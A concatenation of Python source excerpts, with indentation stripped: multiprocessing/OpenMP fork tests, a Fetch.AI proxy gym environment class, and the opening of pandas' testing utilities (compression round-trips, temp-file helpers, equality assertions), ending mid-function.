cmdline = [sys.executable, '-c', runme]
out, err = self.run_cmd(cmdline)
if self._DEBUG:
print(out, err)
@linux_only
@skip_unless_py3
def test_serial_parent_explicit_mp_fork_par_child_then_par_parent(self):
"""
Explicit use of multiprocessing 'fork'.
Does this:
1. Start with no OpenMP
2. Fork to processes using OpenMP
3. Join forks
4. Run some OpenMP
"""
body = """if 1:
X = np.arange(1000000.)
Y = np.arange(1000000.)
q = multiprocessing.Queue()
# this is ok
procs = []
ctx = multiprocessing.get_context('fork')
for x in range(10):
# fork() underneath with but no OpenMP in parent, this is ok
proc = ctx.Process(target = busy_func, args=(X, Y, q))
procs.append(proc)
proc.start()
[p.join() for p in procs]
# and this is still ok as the OpenMP happened in forks
Z = busy_func(X, Y, q)
try:
q.get(False)
except multiprocessing.queues.Empty:
pass
else:
raise RuntimeError("Queue was not empty")
"""
runme = self.template % body
cmdline = [sys.executable, '-c', runme]
out, err = self.run_cmd(cmdline)
if self._DEBUG:
print(out, err)
@parfors_skip_unsupported
class TestInitSafetyIssues(TestCase):
_DEBUG = False
@linux_only # only linux can leak semaphores
@skip_unless_py3 # need multiprocessing.get_context to obtain spawn on linux
def test_orphaned_semaphore(self):
# sys path injection and separate usecase module to make sure everything
# is importable by children of multiprocessing
def run_cmd(cmdline):
popen = subprocess.Popen(cmdline,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,)
# finish in _TEST_TIMEOUT seconds or kill it
timeout = threading.Timer(_TEST_TIMEOUT, popen.kill)
try:
timeout.start()
out, err = popen.communicate()
if popen.returncode != 0:
raise AssertionError(
"process failed with code %s: stderr follows\n%s\n" %
(popen.returncode, err.decode()))
finally:
timeout.cancel()
return out.decode(), err.decode()
test_file = os.path.join(os.path.dirname(__file__),
"orphaned_semaphore_usecase.py")
cmdline = [sys.executable, test_file]
out, err = run_cmd(cmdline)
# assert no semaphore leaks reported on stderr
self.assertNotIn("leaked semaphore", err)
if self._DEBUG:
print("OUT:", out)
print("ERR:", err)
if __name__ == '__main__':
unittest.main()
|
env.py | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2022 Valory AG
# Copyright 2018-2021 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This contains the proxy gym environment."""
import sys
import time
from queue import Queue
from threading import Thread
from typing import Any, Optional, Tuple, cast
import gym
from aea.common import Address
from aea.helpers.base import locate
from aea.mail.base import Envelope
from aea.protocols.base import Message
from aea.protocols.dialogue.base import Dialogue as BaseDialogue
sys.modules["packages.fetchai.connections.gym"] = locate( # isort:skip
"packages.fetchai.connections.gym"
)
sys.modules["packages.fetchai.protocols.gym"] = locate( # isort:skip
"packages.fetchai.protocols.gym"
)
from packages.fetchai.connections.gym.connection import ( # noqa: E402 # pylint: disable=wrong-import-position
PUBLIC_ID as GYM_CONNECTION_PUBLIC_ID,
)
from packages.fetchai.protocols.gym.dialogues import ( # noqa: E402 # pylint: disable=wrong-import-position
GymDialogue as BaseGymDialogue,
)
from packages.fetchai.protocols.gym.dialogues import ( # noqa: E402 # pylint: disable=wrong-import-position
GymDialogues as BaseGymDialogues,
)
from packages.fetchai.protocols.gym.message import ( # noqa: E402 # pylint: disable=wrong-import-position
GymMessage,
)
from .agent import ProxyAgent # noqa: E402 # pylint: disable=wrong-import-position
Action = Any
Observation = Any
Reward = float
Done = bool
Info = dict
Feedback = Tuple[Observation, Reward, Done, Info]
GymDialogue = BaseGymDialogue
GymDialogues = BaseGymDialogues
def role_from_first_message( # pylint: disable=unused-argument
message: Message, receiver_address: Address
) -> BaseDialogue.Role:
"""Infer the role of the agent from an incoming/outgoing first message
:param message: an incoming/outgoing first message
:param receiver_address: the address of the receiving agent
:return: The role of the agent
"""
return BaseGymDialogue.Role.AGENT
class ProxyEnv(gym.Env):
"""This class implements a proxy gym environment."""
def __init__(self, gym_env: gym.Env) -> None:
"""
Instantiate the proxy environment.
:param gym_env: gym environment
"""
super().__init__()
self._queue: Queue = Queue()
self._action_counter: int = 0
self.gym_address = str(GYM_CONNECTION_PUBLIC_ID)
self._agent = ProxyAgent(
name="proxy", gym_env=gym_env, proxy_env_queue=self._queue
)
self._agent_thread = Thread(target=self._agent.start)
self._active_dialogue = None # type: Optional[GymDialogue]
self.gym_skill = "fetchai/gym:0.1.0"
self.gym_dialogues = GymDialogues(self.gym_skill, role_from_first_message)
@property
def active_dialogue(self) -> GymDialogue:
"""Get the active dialogue."""
return self._active_dialogue
def step(self, action: Action) -> Feedback:
"""
Run one time-step of the environment's dynamics.
Mirrors the standard 'step' method of a gym environment.
- The action is given to _encode_action, which does the necessary conversion to an envelope.
- The envelope is given to the outbox of the proxy agent.
- The method blocks until the _queue returns an envelope.
- The envelope is decoded with _decode_percept to a message.
- The message is converted into the standard observation, reward, done and info via _message_to_percept
:param action: the action sent to the step method (e.g. the output of an RL algorithm)
:return: a Tuple containing the Feedback of Observation, Reward, Done and Info
"""
self._action_counter += 1
step_id = self._action_counter
self._encode_and_send_action(action, step_id)
# Wait (blocking!) for the response envelope from the environment
in_envelope = self._queue.get(block=True, timeout=None) # type: Envelope
msg = self._decode_percept(in_envelope, step_id)
observation, reward, done, info = self._message_to_percept(msg)
return observation, reward, done, info
def render(self, mode="human") -> None:
"""
Render the environment.
:param mode: the run mode
"""
self._agent.runtime.multiplexer.default_connection.channel.gym_env.render(mode)
def reset(self) -> None:
"""Reset the environment."""
if not self._agent.runtime.multiplexer.is_connected:
self._connect()
gym_msg, gym_dialogue = self.gym_dialogues.create(
counterparty=self.gym_address, performative=GymMessage.Performative.RESET,
)
gym_dialogue = cast(GymDialogue, gym_dialogue)
self._active_dialogue = gym_dialogue
self._agent.outbox.put_message(message=gym_msg)
# Wait (blocking!) for the response envelope from the environment
in_envelope = self._queue.get(block=True, timeout=None) # type: GymMessage
self._decode_status(in_envelope)
def close(self) -> None:
"""Close the environment."""
last_msg = self.active_dialogue.last_message
if last_msg is None:
raise ValueError("Cannot retrieve last message.")
gym_msg = self.active_dialogue.reply(
performative=GymMessage.Performative.CLOSE, target_message=last_msg,
)
self._agent.outbox.put_message(message=gym_msg)
self._disconnect()
def _connect(self):
"""Connect to this proxy environment. It starts a proxy agent that can interact with the framework."""
if self._agent_thread.is_alive():
raise ValueError("Agent already running.")
self._agent_thread.start()
while not self._agent.runtime.is_running: # check agent completely running
time.sleep(0.01)
def _disconnect(self):
"""Disconnect from this proxy environment. It stops the proxy agent and kills its thread."""
self._agent.stop()
self._agent_thread.join()
self._agent_thread = None
def _encode_and_send_action(self, action: Action, step_id: int) -> None:
"""
Encode the 'action' sent to the step function and send.
:param action: the action that is the output of an RL algorithm.
:param step_id: the step id
"""
last_msg = self.active_dialogue.last_message
if last_msg is None:
raise ValueError("Cannot retrieve last message.")
gym_msg = self.active_dialogue.reply(
performative=GymMessage.Performative.ACT,
target_message=last_msg,
action=GymMessage.AnyObject(action),
step_id=step_id,
)
# Send the message via the proxy agent and to the environment
self._agent.outbox.put_message(message=gym_msg)
def _decode_percept(self, envelope: Envelope, expected_step_id: int) -> GymMessage:
"""
Receive the response from the gym environment in the form of an envelope and decode it.
The response is a PERCEPT message containing the usual 'observation', 'reward', 'done', 'info' parameters.
:param envelope: the envelope
:param expected_step_id: the expected step id
:return: a message received as a response to the action performed in apply_action.
"""
if envelope is not None:
if (
envelope.protocol_specification_id
== GymMessage.protocol_specification_id
):
gym_msg = cast(GymMessage, envelope.message)
gym_dialogue = self.gym_dialogues.update(gym_msg)
if not gym_dialogue:
raise ValueError("Could not udpate dialogue.")
if not gym_dialogue == self.active_dialogue:
raise ValueError("Dialogue does not match.")
if (
gym_msg.performative == GymMessage.Performative.PERCEPT
and gym_msg.step_id == expected_step_id
):
return gym_msg
raise ValueError(
"Unexpected performative or no step_id: {}".format(
gym_msg.performative
)
)
raise ValueError(
"Unknown protocol_specification_id: {}".format(
envelope.protocol_specification_id
)
)
raise ValueError("Missing envelope.")
def _decode_status(self, envelope: Envelope) -> None:
"""
Receive the response from the gym environment in the form of an envelope and decode it.
The response is a STATUS message.
:param envelope: the envelope
:return: a message received as a response to the action performed in apply_action.
"""
if envelope is not None:
if (
envelope.protocol_specification_id
== GymMessage.protocol_specification_id
):
gym_msg = cast(GymMessage, envelope.message)
gym_dialogue = self.gym_dialogues.update(gym_msg)
if not gym_dialogue:
raise ValueError("Could not udpate dialogue.")
if not gym_dialogue == self.active_dialogue:
raise ValueError("Dialogue does not match.")
if (
gym_msg.performative == GymMessage.Performative.STATUS
and gym_msg.content.get("reset", "failure") == "success"
):
return None
raise ValueError(
"Unexpected performative or no step_id: {}".format(
gym_msg.performative
)
)
raise ValueError(
"Unknown protocol_id: {}".format(envelope.protocol_specification_id)
)
raise ValueError("Missing envelope.")
@staticmethod
def _message_to_percept(message: GymMessage) -> Feedback:
"""
Transform the message received from the gym environment into observation, reward, done, info.
:param message: the message received as a response to the action performed in apply_action.
:return: the standard feedback (observation, reward, done, info) of a gym environment.
"""
observation = cast(Any, message.observation.any)
reward = cast(float, message.reward)
done = cast(bool, message.done)
info = cast(dict, message.info.any)
return observation, reward, done, info
|
_testing.py | import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import operator
import os
from shutil import rmtree
import string
import tempfile
from typing import Any, Callable, ContextManager, List, Optional, Type, Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._libs.lib import no_default
import pandas._libs.testing as _testing
from pandas._typing import Dtype, FilePathOrBuffer, FrameOrSeries
from pandas.compat import _get_lzma_file, _import_lzma
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_number,
is_numeric_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.core.arrays.datetimelike import DatetimeLikeArrayMixin
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
lzma = _import_lzma()
_N = 30
_K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
UNSIGNED_INT_DTYPES: List[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_EA_INT_DTYPES: List[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_DTYPES: List[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_EA_INT_DTYPES: List[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_DTYPES = UNSIGNED_INT_DTYPES + SIGNED_INT_DTYPES
ALL_EA_INT_DTYPES = UNSIGNED_EA_INT_DTYPES + SIGNED_EA_INT_DTYPES
FLOAT_DTYPES: List[Dtype] = [float, "float32", "float64"]
COMPLEX_DTYPES: List[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: List[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: List[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: List[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES = [bool, "bool"]
BYTES_DTYPES = [bytes, "bytes"]
OBJECT_DTYPES = [object, "object"]
ALL_REAL_DTYPES = FLOAT_DTYPES + ALL_INT_DTYPES
ALL_NUMPY_DTYPES = (
ALL_REAL_DTYPES
+ COMPLEX_DTYPES
+ STRING_DTYPES
+ DATETIME64_DTYPES
+ TIMEDELTA64_DTYPES
+ BOOL_DTYPES
+ OBJECT_DTYPES
+ BYTES_DTYPES
)
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("always", _testing_mode_warnings)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("ignore", _testing_mode_warnings)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
def round_trip_pickle(
obj: Any, path: Optional[FilePathOrBuffer] = None
) -> FrameOrSeries:
"""
Pickle an object and then read it again.
Parameters
----------
obj : any object
The object to pickle and then re-read.
path : str, path object or file-like object, default None
The path where the pickled object is written and then read.
Returns
-------
pandas object
The original object that was pickled and then re-read.
"""
_path = path
if _path is None:
_path = f"__{rands(10)}__.pickle"
with ensure_clean(_path) as temp_path:
pd.to_pickle(obj, temp_path)
return pd.read_pickle(temp_path)
def round_trip_pathlib(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a pathlib.Path and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
Path = pytest.importorskip("pathlib").Path
if path is None:
path = "___pathlib___"
with ensure_clean(path) as path:
writer(Path(path))
obj = reader(Path(path))
return obj
def round_trip_localpath(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a py.path LocalPath and read it back.
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
LocalPath = pytest.importorskip("py.path").local
if path is None:
path = "___localpath___"
with ensure_clean(path) as path:
writer(LocalPath(path))
obj = reader(LocalPath(path))
return obj
@contextmanager
def decompress_file(path, compression):
"""
Open a compressed file and return a file object.
Parameters
----------
path : str
The path where the file is read from.
compression : {'gzip', 'bz2', 'zip', 'xz', None}
Name of the decompression to use
Returns
-------
file object
"""
if compression is None:
f = open(path, "rb")
elif compression == "gzip":
f = gzip.open(path, "rb")
elif compression == "bz2":
f = bz2.BZ2File(path, "rb")
elif compression == "xz":
f = _get_lzma_file(lzma)(path, "rb")
elif compression == "zip":
zip_file = zipfile.ZipFile(path)
zip_names = zip_file.namelist()
if len(zip_names) == 1:
f = zip_file.open(zip_names.pop())
else:
raise ValueError(f"ZIP file {path} error. Only one file per ZIP.")
else:
raise ValueError(f"Unrecognized compression type: {compression}")
try:
yield f
finally:
f.close()
if compression == "zip":
zip_file.close()
def write_to_compressed(compression, path, data, dest="test"):
"""
Write data to a compressed file.
Parameters
----------
compression : {'gzip', 'bz2', 'zip', 'xz'}
The compression type to use.
path : str
The file path to write the data.
data : str
The data to write.
dest : str, default "test"
The destination file (for ZIP only)
Raises
------
ValueError : An invalid compression value was passed in.
"""
if compression == "zip":
compress_method = zipfile.ZipFile
elif compression == "gzip":
compress_method = gzip.GzipFile
elif compression == "bz2":
compress_method = bz2.BZ2File
elif compression == "xz":
compress_method = _get_lzma_file(lzma)
else:
raise ValueError(f"Unrecognized compression type: {compression}")
if compression == "zip":
mode = "w"
args = (dest, data)
method = "writestr"
else:
mode = "wb"
args = (data,)
method = "write"
with compress_method(path, mode=mode) as f:
getattr(f, method)(*args)
def _get_tol_from_less_precise(check_less_precise: Union[bool, int]) -> float:
"""
Return the tolerance equivalent to the deprecated `check_less_precise`
parameter.
Parameters
----------
check_less_precise : bool or int
Returns
-------
float
Tolerance to be used as relative/absolute tolerance.
Examples
--------
>>> # Using check_less_precise as a bool:
>>> _get_tol_from_less_precise(False)
0.5e-5
>>> _get_tol_from_less_precise(True)
0.5e-3
>>> # Using check_less_precise as an int representing the decimal
>>> # tolerance intended:
>>> _get_tol_from_less_precise(2)
0.5e-2
>>> _get_tol_from_less_precise(8)
0.5e-8
"""
if isinstance(check_less_precise, bool):
if check_less_precise:
# 3-digit tolerance
return 0.5e-3
else:
# 5-digit tolerance
return 0.5e-5
else:
# Equivalent to setting checking_less_precise=<decimals>
return 0.5 * 10 ** -check_less_precise
def assert_almost_equal(
left,
right,
check_dtype: Union[bool, str] = "equiv",
check_less_precise: Union[bool, int] = no_default,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
**kwargs,
):
"""
Check that the left and right objects are approximately equal.
By approximately equal, we refer to objects that are numbers or that
contain numbers which may be equivalent to specific levels of precision.
Parameters
----------
left : object
right : object
check_dtype : bool or {'equiv'}, default 'equiv'
Check dtype if both a and b are the same type. If 'equiv' is passed in,
then `RangeIndex` and `Int64Index` are also considered equivalent
when doing type checking.
check_less_precise : bool or int, default False
Specify comparison precision. 5 digits (False) or 3 digits (True)
after decimal points are compared. If int, then specify the number
of digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
rtol : float, default 1e-5
Relative tolerance.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance.
.. versionadded:: 1.1.0
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
if isinstance(left, pd.Index):
assert_index_equal(
left,
right,
check_exact=False,
exact=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.Series):
assert_series_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
else:
# Other sequences.
if check_dtype:
if is_number(left) and is_number(right):
# Do not compare numeric classes, like np.float64 and float.
pass
elif is_bool(left) and is_bool(right):
# Do not compare bool classes, like np.bool_ and bool.
pass
else:
if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
obj = "numpy array"
else:
obj = "Input"
assert_class_equal(left, right, obj=obj)
_testing.assert_almost_equal(
left, right, check_dtype=check_dtype, rtol=rtol, atol=atol, **kwargs
)
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(left)} instead"
)
if not isinstance(right, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(right)} instead"
)
def assert_dict_equal(left, right, compare_keys: bool = True):
_check_isinstance(left, right, dict)
_testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p: float = 0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
"""
Generate an array of byte strings.
"""
retval = (
np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def randu_array(nchars, size, dtype="O"):
"""
Generate an array of unicode strings.
"""
retval = (
np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def rands(nchars):
"""
Generate one random byte string.
See `rands_array` if you want to create an array of random strings.
"""
return "".join(np.random.choice(RANDS_CHARS, nchars))
def close(fignum=None):
from matplotlib.pyplot import get_fignums, close as _close
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False, **kwargs):
"""
Gets a temporary path and agrees to remove on close.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
**kwargs
Additional keywords passed in for creating a temporary file.
:meth:`tempFile.TemporaryFile` is used when `return_filelike` is ``True``.
:meth:`tempfile.mkstemp` is used when `return_filelike` is ``False``.
Note that the `filename` parameter will be passed in as the `suffix`
argument to either function.
See Also
--------
tempfile.TemporaryFile
tempfile.mkstemp
"""
filename = filename or ""
fd = None
kwargs["suffix"] = filename
if return_filelike:
f = tempfile.TemporaryFile(**kwargs)
try:
yield f
finally:
f.close()
else:
# Don't generate tempfile if using a path with directory specified.
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(**kwargs)
except UnicodeEncodeError:
import pytest
pytest.skip("no unicode file names on this system")
try:
yield filename
finally:
try:
os.close(fd)
except OSError:
print(f"Couldn't close file descriptor: {fd} (file: {filename})")
try:
if os.path.exists(filename):
os.remove(filename)
except OSError as e:
print(f"Exception on removing file: {e}")
@contextmanager
def ensure_clean_dir():
"""
Get a temporary directory path and agrees to remove on close.
Yields
------
Temporary directory path
"""
directory_name = tempfile.mkdtemp(suffix="")
try:
yield directory_name
finally:
try:
rmtree(directory_name)
except OSError:
pass
@contextmanager
def ensure_safe_environment_variables():
"""
Get a context manager to safely set environment variables
All changes will be undone on close, hence environment variables set
within this contextmanager will neither persist nor change global state.
"""
saved_environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_index_equal(
left: Index,
right: Index,
exact: Union[bool, str] = "equiv",
check_names: bool = True,
check_less_precise: Union[bool, int] = no_default,
check_exact: bool = True,
check_categorical: bool = True,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
obj: str = "Index",
) -> None:
"""
Check that left and right Index are equal.
Parameters
----------
left : Index
right : Index
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
check_names : bool, default True
Whether to check the names attribute.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default True
Whether to compare number exactly.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Index'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
def _check_types(l, r, obj="Index"):
if exact:
assert_class_equal(l, r, exact=exact, obj=obj)
# Skip exact dtype checking when `check_categorical` is False
if check_categorical:
assert_attr_equal("dtype", l, r, obj=obj)
# allow string-like to have different inferred_types
if l.inferred_type in ("string"):
assert r.inferred_type in ("string")
else:
assert_attr_equal("inferred_type", l, r, obj=obj)
def _get_ilevel_values(index, level):
# accept level number only
unique = index.levels[level]
level_codes = index.codes[level]
filled = take_1d(unique._values, level_codes, fill_value=unique._na_value)
values = unique._shallow_copy(filled, name=index.names[level])
return values
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Index)
# class / dtype comparison
_check_types(left, right, obj=obj)
# level comparison
if left.nlevels != right.nlevels:
msg1 = f"{obj} levels are different"
msg2 = f"{left.nlevels}, {left}"
msg3 = f"{right.nlevels}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# length comparison
if len(left) != len(right):
msg1 = f"{obj} length are different"
msg2 = f"{len(left)}, {left}"
msg3 = f"{len(right)}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# MultiIndex special comparison for little-friendly error messages
if left.nlevels > 1:
left = cast(MultiIndex, left)
right = cast(MultiIndex, right)
for level in range(left.nlevels):
# cannot use get_level_values here because it can change dtype
llevel = _get_ilevel_values(left, level)
rlevel = _get_ilevel_values(right, level)
lobj = f"MultiIndex level [{level}]"
assert_index_equal(
llevel,
rlevel,
exact=exact,
check_names=check_names,
check_exact=check_exact,
rtol=rtol,
atol=atol,
obj=lobj,
)
# get_level_values may change dtype
_check_types(left.levels[level], right.levels[level], obj=obj)
# skip exact index checking when `check_categorical` is False
if check_exact and check_categorical:
if not left.equals(right):
diff = np.sum((left.values != right.values).astype(int)) * 100.0 / len(left)
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
else:
_testing.assert_almost_equal(
left.values,
right.values,
rtol=rtol,
atol=atol,
check_dtype=exact,
obj=obj,
lobj=left,
robj=right,
)
# metadata comparison
if check_names:
assert_attr_equal("names", left, right, obj=obj)
if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
assert_attr_equal("freq", left, right, obj=obj)
if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
assert_interval_array_equal(left._values, right._values)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(left._values, right._values, obj=f"{obj} category")
def assert_class_equal(left, right, exact: Union[bool, str] = True, obj="Input"):
"""
Checks classes are equal.
"""
__tracebackhide__ = True
def repr_class(x):
if isinstance(x, Index):
# return Index as it is to include values in the error message
return x
return type(x).__name__
if exact == "equiv":
if type(left) != type(right):
# allow equivalence of Int64Index/RangeIndex
types = {type(left).__name__, type(right).__name__}
if len(types - {"Int64Index", "RangeIndex"}):
msg = f"{obj} classes are not equivalent"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
elif exact:
if type(left) != type(right):
msg = f"{obj} classes are different"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr: str, left, right, obj: str = "Attributes"):
"""
Check attributes are equal. Both objects must have attribute.
Parameters
----------
attr : str
Attribute name being compared.
left : object
right : object
obj : str, default 'Attributes'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
if left_attr is right_attr:
return True
elif (
is_number(left_attr)
and np.isnan(left_attr)
and is_number(right_attr)
and np.isnan(right_attr)
):
# np.nan
return True
try:
result = left_attr == right_attr
except TypeError:
# datetimetz on rhs may raise TypeError
result = False
if not isinstance(result, bool):
result = result.all()
if result:
return True
else:
msg = f'Attribute "{attr}" are different'
raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
import matplotlib.pyplot as plt
if isinstance(objs, (pd.Series, np.ndarray)):
for el in objs.ravel():
msg = (
"one of 'objs' is not a matplotlib Axes instance, "
f"type encountered {repr(type(el).__name__)}"
)
assert isinstance(el, (plt.Axes, dict)), msg
else:
msg = (
"objs is neither an ndarray of Artist instances nor a single "
"ArtistArtist instance, tuple, or dict, 'objs' is a "
f"{repr(type(objs).__name__)}"
)
assert isinstance(objs, (plt.Artist, tuple, dict)), msg
def assert_is_sorted(seq):
"""Assert that the sequence is sorted."""
if isinstance(seq, (Index, Series)):
seq = seq.values
# sorting does not change precisions
assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
"""
Test that Categoricals are equivalent.
Parameters
----------
left : Categorical
right : Categorical
check_dtype : bool, default True
Check that integer dtype of the codes are the same
check_category_order : bool, default True
Whether the order of the categories should be compared, which
implies identical integer codes. If False, only the resulting
values are compared. The ordered attribute is
checked regardless.
obj : str, default 'Categorical'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, Categorical)
if check_category_order:
assert_index_equal(left.categories, right.categories, obj=f"{obj}.categories")
assert_numpy_array_equal(
left.codes, right.codes, check_dtype=check_dtype, obj=f"{obj}.codes",
)
else:
try:
lc = left.categories.sort_values()
rc = right.categories.sort_values()
except TypeError:
# e.g. '<' not supported between instances of 'int' and 'str'
lc, rc = left.categories, right.categories
assert_index_equal(
lc, rc, obj=f"{obj}.categories",
)
assert_index_equal(
left.categories.take(left.codes),
right.categories.take(right.codes),
obj=f"{obj}.values",
)
assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
"""
